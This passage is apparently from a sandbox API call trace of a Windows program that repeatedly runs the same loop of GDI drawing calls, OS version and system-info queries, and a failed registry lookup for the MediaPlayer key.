hrgnSrc2=0x810401cd, iMode=1) returned 1 [0087.680] CombineRgn (hrgnDst=0x10409b2, hrgnSrc1=0x7f0401d0, hrgnSrc2=0x810401cd, iMode=4) returned 2 [0087.680] CreateSolidBrush (color=0xff) returned 0x21009b0 [0087.680] CreateSolidBrush (color=0xff0000) returned 0x11009b3 [0087.680] DeleteObject (ho=0x11009b3) returned 1 [0087.680] DeleteObject (ho=0x810401cd) returned 1 [0087.680] DeleteObject (ho=0x7f0401d0) returned 1 [0087.680] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.680] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.680] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.680] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.680] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.680] BeginPath (hdc=0x0) returned 0 [0087.681] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.681] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.681] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.681] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.681] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.681] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.681] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401cd [0087.681] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401d0 [0087.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b4 [0087.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b5 [0087.681] CombineRgn (hrgnDst=0x10409b4, hrgnSrc1=0x820401cd, hrgnSrc2=0x800401d0, iMode=1) returned 1 [0087.681] CombineRgn (hrgnDst=0x10409b5, hrgnSrc1=0x820401cd, hrgnSrc2=0x800401d0, iMode=4) returned 2 [0087.681] CreateSolidBrush (color=0xff) returned 0x21009b3 [0087.681] CreateSolidBrush (color=0xff0000) returned 0x11009b6 [0087.681] DeleteObject (ho=0x11009b6) returned 1 [0087.681] DeleteObject (ho=0x800401d0) returned 1 [0087.681] DeleteObject (ho=0x820401cd) returned 1 [0087.681] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.681] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.681] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.681] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.681] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.681] BeginPath (hdc=0x0) returned 0 [0087.681] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.681] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.681] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.681] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.681] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.681] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.681] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401d0 [0087.681] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401cd [0087.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b7 [0087.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b8 [0087.682] CombineRgn (hrgnDst=0x10409b7, hrgnSrc1=0x810401d0, hrgnSrc2=0x830401cd, iMode=1) returned 1 [0087.682] CombineRgn (hrgnDst=0x10409b8, hrgnSrc1=0x810401d0, hrgnSrc2=0x830401cd, iMode=4) returned 2 [0087.682] CreateSolidBrush (color=0xff) returned 0x21009b6 [0087.682] CreateSolidBrush (color=0xff0000) returned 0x11009b9 [0087.682] DeleteObject (ho=0x11009b9) returned 1 [0087.682] DeleteObject (ho=0x830401cd) returned 1 [0087.682] DeleteObject (ho=0x810401d0) returned 1 [0087.682] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.682] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.682] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.682] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.682] BeginPath (hdc=0x0) returned 0 [0087.682] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.682] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.682] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.682] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.682] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.682] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401cd [0087.682] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401d0 [0087.682] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ba [0087.682] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409bb [0087.682] CombineRgn (hrgnDst=0x10409ba, hrgnSrc1=0x840401cd, hrgnSrc2=0x820401d0, iMode=1) returned 1 [0087.682] CombineRgn (hrgnDst=0x10409bb, hrgnSrc1=0x840401cd, hrgnSrc2=0x820401d0, iMode=4) returned 2 [0087.682] CreateSolidBrush (color=0xff) returned 0x21009b9 [0087.682] CreateSolidBrush (color=0xff0000) returned 0x11009bc [0087.682] DeleteObject (ho=0x11009bc) returned 1 [0087.682] DeleteObject (ho=0x820401d0) returned 1 [0087.682] DeleteObject (ho=0x840401cd) returned 1 [0087.682] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.682] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.682] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.682] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.682] BeginPath (hdc=0x0) returned 0 [0087.682] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.682] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.682] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.683] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.683] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401d0 [0087.683] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401cd [0087.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409bd [0087.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409be [0087.683] CombineRgn (hrgnDst=0x10409bd, hrgnSrc1=0x830401d0, hrgnSrc2=0x850401cd, iMode=1) returned 1 [0087.683] CombineRgn (hrgnDst=0x10409be, hrgnSrc1=0x830401d0, hrgnSrc2=0x850401cd, iMode=4) returned 2 [0087.683] CreateSolidBrush (color=0xff) returned 0x21009bc [0087.683] CreateSolidBrush (color=0xff0000) returned 0x11009bf [0087.683] DeleteObject (ho=0x11009bf) returned 1 [0087.683] DeleteObject (ho=0x850401cd) returned 1 [0087.683] DeleteObject (ho=0x830401d0) returned 1 [0087.683] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.683] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.683] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.683] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.683] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.683] BeginPath (hdc=0x0) returned 0 [0087.683] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.683] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.683] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.683] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.683] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.683] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.683] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.683] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401cd [0087.683] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401d0 [0087.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c0 [0087.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c1 [0087.683] CombineRgn (hrgnDst=0x10409c0, hrgnSrc1=0x860401cd, hrgnSrc2=0x840401d0, iMode=1) returned 1 [0087.683] CombineRgn (hrgnDst=0x10409c1, hrgnSrc1=0x860401cd, hrgnSrc2=0x840401d0, iMode=4) returned 2 [0087.683] CreateSolidBrush (color=0xff) returned 0x21009bf [0087.683] CreateSolidBrush (color=0xff0000) returned 0x11009c2 [0087.683] DeleteObject (ho=0x11009c2) returned 1 [0087.684] DeleteObject (ho=0x840401d0) returned 1 [0087.684] DeleteObject (ho=0x860401cd) returned 1 [0087.684] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.684] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.684] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.684] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.684] BeginPath (hdc=0x0) returned 0 [0087.684] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.684] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.684] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.684] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.684] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.684] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401d0 [0087.684] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401cd [0087.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c3 [0087.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c4 [0087.684] CombineRgn (hrgnDst=0x10409c3, hrgnSrc1=0x850401d0, hrgnSrc2=0x870401cd, iMode=1) returned 1 [0087.684] CombineRgn (hrgnDst=0x10409c4, hrgnSrc1=0x850401d0, hrgnSrc2=0x870401cd, iMode=4) returned 2 [0087.684] CreateSolidBrush (color=0xff) returned 0x21009c2 [0087.684] CreateSolidBrush (color=0xff0000) returned 0x11009c5 [0087.684] DeleteObject (ho=0x11009c5) returned 1 [0087.684] DeleteObject (ho=0x870401cd) returned 1 [0087.684] DeleteObject (ho=0x850401d0) returned 1 [0087.684] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.684] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.684] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.684] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.684] BeginPath (hdc=0x0) returned 0 [0087.684] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.684] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.684] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.684] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.684] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.685] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401cd [0087.685] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401d0 [0087.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c6 [0087.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c7 [0087.685] CombineRgn (hrgnDst=0x10409c6, hrgnSrc1=0x880401cd, hrgnSrc2=0x860401d0, iMode=1) returned 1 [0087.685] CombineRgn (hrgnDst=0x10409c7, hrgnSrc1=0x880401cd, hrgnSrc2=0x860401d0, iMode=4) returned 2 [0087.685] CreateSolidBrush (color=0xff) returned 0x21009c5 [0087.685] CreateSolidBrush (color=0xff0000) returned 0x11009c8 [0087.685] DeleteObject (ho=0x11009c8) returned 1 [0087.685] DeleteObject (ho=0x860401d0) returned 1 [0087.685] DeleteObject (ho=0x880401cd) returned 1 [0087.685] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.685] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.685] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.685] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.685] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.685] BeginPath (hdc=0x0) returned 0 [0087.685] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.685] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.685] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.685] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.685] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.685] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.685] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.685] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.685] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401d0 [0087.685] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401cd [0087.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c9 [0087.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ca [0087.685] CombineRgn (hrgnDst=0x10409c9, hrgnSrc1=0x870401d0, hrgnSrc2=0x890401cd, iMode=1) returned 1 [0087.685] CombineRgn (hrgnDst=0x10409ca, hrgnSrc1=0x870401d0, hrgnSrc2=0x890401cd, iMode=4) returned 2 [0087.685] CreateSolidBrush (color=0xff) returned 0x21009c8 [0087.685] CreateSolidBrush (color=0xff0000) returned 0x11009cb [0087.685] DeleteObject (ho=0x11009cb) returned 1 [0087.685] DeleteObject (ho=0x890401cd) returned 1 [0087.685] DeleteObject (ho=0x870401d0) returned 1 [0087.685] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.685] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.686] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.686] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.686] BeginPath (hdc=0x0) returned 0 [0087.686] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.686] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.686] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.686] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.686] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401cd [0087.686] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401d0 [0087.686] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409cc [0087.686] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409cd [0087.686] CombineRgn (hrgnDst=0x10409cc, hrgnSrc1=0x8a0401cd, hrgnSrc2=0x880401d0, iMode=1) returned 1 [0087.686] CombineRgn (hrgnDst=0x10409cd, hrgnSrc1=0x8a0401cd, hrgnSrc2=0x880401d0, iMode=4) returned 2 [0087.686] CreateSolidBrush (color=0xff) returned 0x21009cb [0087.686] CreateSolidBrush (color=0xff0000) returned 0x11009ce [0087.686] DeleteObject (ho=0x11009ce) returned 1 [0087.686] DeleteObject (ho=0x880401d0) returned 1 [0087.686] DeleteObject (ho=0x8a0401cd) returned 1 [0087.686] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.686] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, 